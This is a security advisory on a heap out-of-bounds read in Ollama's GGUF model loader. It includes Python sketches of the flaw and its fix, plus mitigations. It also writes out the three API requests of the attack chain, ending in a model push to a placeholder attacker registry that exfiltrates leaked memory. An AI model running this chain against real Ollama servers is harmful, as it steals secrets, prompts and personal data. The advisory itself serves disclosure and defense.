Overview
A critical vulnerability dubbed Bleeding Llama (CVE-2026-7482, CVSS 9.3) has been disclosed in Ollama, the widely used open-source framework for running large language models locally and in self-hosted environments. Discovered by Cyera, the flaw allows a remote, unauthenticated attacker to read sensitive data from the server’s heap memory — including prompts, chat history, environment variables, API keys, and secrets — and exfiltrate it to an attacker-controlled server. With an estimated 300,000 Ollama instances exposed on the public internet and no authentication enabled by default, the practical blast radius of this vulnerability is immediate and severe.
Technical Analysis
The vulnerability resides in Ollama’s GGUF model loader, the component responsible for ingesting model files in the GGUF format. The flaw is a classic heap out-of-bounds read: an attacker supplies a maliciously crafted GGUF file in which a tensor’s declared offset and size exceed the actual file length. When Ollama processes this file, it reads beyond the allocated heap buffer, accessing adjacent memory regions that may contain live runtime data.
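The pattern can be illustrated with a short sketch. This is not Ollama's actual code (its GGUF loader is written in Go); it is a minimal Python model of the same logic, where a loader that trusts attacker-declared tensor bounds reads past the file's bytes into adjacent heap data, while a patched loader rejects the tensor up front.

```python
# Simplified model of the Bleeding Llama out-of-bounds read.
# NOT Ollama's actual implementation; the heap layout, secret value,
# and function names here are illustrative.

def load_tensor_unsafe(heap: bytes, file_len: int, offset: int, size: int) -> bytes:
    # Vulnerable pattern: the declared offset/size from the GGUF header
    # are used directly, so a tensor can extend past the file's bytes
    # into adjacent memory.
    return heap[offset:offset + size]

def load_tensor_safe(heap: bytes, file_len: int, offset: int, size: int) -> bytes:
    # Patched pattern: reject any tensor whose declared extent exceeds
    # the actual file length before reading.
    if offset < 0 or size < 0 or offset + size > file_len:
        raise ValueError("tensor bounds exceed file length")
    return heap[offset:offset + size]

# Model the process heap: the mapped GGUF file followed by unrelated
# runtime data (e.g., an API key) living in adjacent memory.
gguf_file = b"GGUF....tensor-data"
adjacent_secret = b"OPENAI_API_KEY=sk-test-123"
heap = gguf_file + adjacent_secret

# A crafted tensor declares a size that runs past the end of the file,
# so the returned "tensor data" carries the neighboring secret.
leak = load_tensor_unsafe(heap, len(gguf_file), offset=8, size=len(heap) - 8)
print(b"sk-test-123" in leak)  # True: the secret leaks into the model blob
```

In the real exploit, the leaked bytes become part of the imported model blob, which is what makes the later exfiltration step possible.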
The attack chain requires only three unauthenticated API calls:
- Upload a crafted GGUF file via Ollama’s model import API.
- Trigger processing of the file, causing the out-of-bounds read and capturing heap data into the resulting model blob.
- Exfiltrate the blob using Ollama’s built-in `model push` feature, sending the memory-laced file to an attacker-controlled registry server.
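The three-step chain can be sketched against Ollama's REST API. The endpoint paths below (`/api/blobs/:digest`, `/api/create`, `/api/push`) follow Ollama's documented API, but the target host, model names, and exact JSON field names are illustrative and vary by Ollama version; the sketch only constructs the requests, it does not send them.

```python
# Sketch of the three unauthenticated API calls in the attack chain.
# Host, digest, and payload field names are placeholders for illustration.
import hashlib
import json

TARGET = "http://victim:11434"   # Ollama's default port, bound to all interfaces
crafted = b"GGUF..."             # malicious GGUF with oversized tensor bounds
digest = "sha256:" + hashlib.sha256(crafted).hexdigest()

steps = [
    # 1. Upload the crafted GGUF as a blob.
    ("POST", f"{TARGET}/api/blobs/{digest}", crafted),
    # 2. Create a model from it, triggering the out-of-bounds read;
    #    leaked heap bytes land in the resulting model blob.
    ("POST", f"{TARGET}/api/create",
     json.dumps({"model": "leak", "files": {"evil.gguf": digest}}).encode()),
    # 3. Push the model to an attacker-controlled registry, exfiltrating
    #    the captured memory.
    ("POST", f"{TARGET}/api/push",
     json.dumps({"model": "attacker-registry.example/leak"}).encode()),
]

for method, url, body in steps:
    print(method, url, f"({len(body)} bytes)")
```

Note that no step requires credentials: the entire chain rides on the API being reachable.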
Because Ollama listens on all network interfaces by default and ships without any authentication mechanism, every internet-accessible instance is exploitable without credentials. The memory regions exposed can include:
- LLM prompt and message history
- Environment variables (e.g., `OPENAI_API_KEY`, cloud provider tokens)
- PHI, PII, and development secrets routed through the inference engine
Framework Mapping
| Framework | Technique/Category | Rationale |
|---|---|---|
| MITRE ATLAS | AML.T0040 – ML Model Inference API Access | Attacker abuses Ollama’s unauthenticated API to trigger the vulnerable code path |
| MITRE ATLAS | AML.T0057 – LLM Data Leakage | Heap memory containing prompts and secrets is exfiltrated |
| MITRE ATLAS | AML.T0043 – Craft Adversarial Data | Maliciously crafted GGUF file is the attack vehicle |
| OWASP LLM | LLM06 – Sensitive Information Disclosure | Primary impact: API keys, PII, and prompts leaked from runtime memory |
| OWASP LLM | LLM05 – Supply Chain Vulnerabilities | GGUF model ingestion pipeline is the exploited trust boundary |
Impact Assessment
The vulnerability affects all Ollama deployments prior to version 0.17.1 that are network-accessible without a firewall or authentication layer. The 300,000 figure represents publicly internet-facing instances; enterprise deployments on internal networks without segmentation are also at risk from insider threats or lateral movement. Depending on how Ollama is integrated, exploitation could expose:
- Enterprise AI workflows: Employee chat history and routed tool outputs
- Development environments: Hardcoded secrets and dev-time API tokens
- Healthcare and legal contexts: PHI and PII passed through prompts
- Multi-tenant platforms: Cross-tenant data leakage if Ollama is shared
Mitigation & Recommendations
- Upgrade immediately to Ollama version 0.17.1, which patches CVE-2026-7482.
- Restrict network access: Firewall Ollama’s API port (default: 11434) to localhost or trusted internal CIDRs only.
- Deploy an authentication proxy (e.g., OAuth2 Proxy, nginx with mTLS) in front of any network-accessible Ollama instance.
- Rotate all secrets: Assume any API keys, tokens, or credentials handled by an exposed Ollama instance are compromised.
- Audit GGUF ingestion pipelines: Validate model file sources and apply integrity checks before loading third-party GGUF files.
- Monitor for anomalous `model push` activity: Alert on outbound model push calls to unknown registries.
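For the GGUF ingestion audit, the core defensive check is the one the patch enforces: no tensor's declared extent may exceed the file's actual length. A minimal sketch of that pre-load validation, assuming tensor metadata (name, offset, size) has already been parsed from the GGUF header, might look like:

```python
# Minimal pre-load bounds check for third-party GGUF files.
# Not a full GGUF parser; tensor metadata extraction is assumed done,
# and the tensor names below are illustrative.

def validate_tensor_bounds(file_size: int,
                           tensors: list[tuple[str, int, int]]) -> list[str]:
    """Return names of tensors whose declared extent exceeds the file."""
    bad = []
    for name, offset, size in tensors:
        if offset < 0 or size < 0 or offset + size > file_size:
            bad.append(name)
    return bad

# A benign tensor fits inside a 1 KiB file; a crafted one does not.
tensors = [("blk.0.attn_q.weight", 128, 512), ("evil", 128, 10**9)]
print(validate_tensor_bounds(1024, tensors))  # ['evil']
```

Rejecting files that fail this check before they ever reach the model loader removes the attack vehicle, independent of whether the runtime itself has been patched.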